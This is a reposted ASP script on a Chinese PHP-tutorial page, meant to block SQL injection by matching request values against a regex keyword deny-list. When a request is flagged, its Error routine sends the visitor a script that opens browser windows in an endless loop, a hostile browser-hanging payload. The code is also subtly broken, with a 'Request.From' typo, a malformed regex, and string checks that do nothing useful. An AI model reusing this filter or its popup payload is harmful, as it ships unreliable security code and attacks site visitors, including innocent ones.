来源:自学PHP网 时间:2015-04-17 13:02 作者: 阅读:次
[导读] %Rem Copy Right by Samy http://www.2cto.comCall SafeRequestSub SafeRequestif Request.QueryString ThenKll_inje(Request.QueryString)if Request.Form Then Kll_inje(Request.From)if......
|
<%
Rem Copy Right by Samy http://www.2cto.com Call SafeRequest Sub SafeRequest if Request.QueryString<>"" Then Kll_inje(Request.QueryString) if Request.Form<>"" Then Kll_inje(Request.From) if Request.Cookies<>"" Then Kll_inje(Request.Cookies) End if End if End if End Sub Function Kll_Inje(Values) rem check sql injection Dim x,Kyd,In_Data Kyd ="(\sand\s|\sunion\s|\sor\s\b|\binsert\b|\bdelete\b|\sunion\s|\bupdate|\bdrop|\bdeclare\b\bcreate\b|\b\'|\;|\*|\@|\(|\)|\<|\>|\!|\-|\.\/|\_|\.\\)" For Each In_Data in Values Set X= New Regexp With X .IgnoreCase = True .Global = True .Pattern = Kyd If .Test(Values(In_Data)) Then Call Error End If End with Set X = Nothing Next End Function Function Kl_int(val) Rem check Integer if Not isnumeric(val) Then Kl_int=0 Call Error else if val<0 or val>2147483647 Then Kl_int =0 else Kl_int=clng(val) End if End if End function Function kl_Str(val) Rem Check String if len(val)<0 Then kl_Str="" else if instr(val,"'") Then kl_Str=trim(Replace(val,"'","")) Call Error End if End if End function Sub Error Response.Write "<script>while(1){window.open('http://www.fbi.gov');}</script>" 'Response.Redirect "/" Response.End End Sub %> 作者:Samy 出处:http://hi.baidu.com/0x7362/blog |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
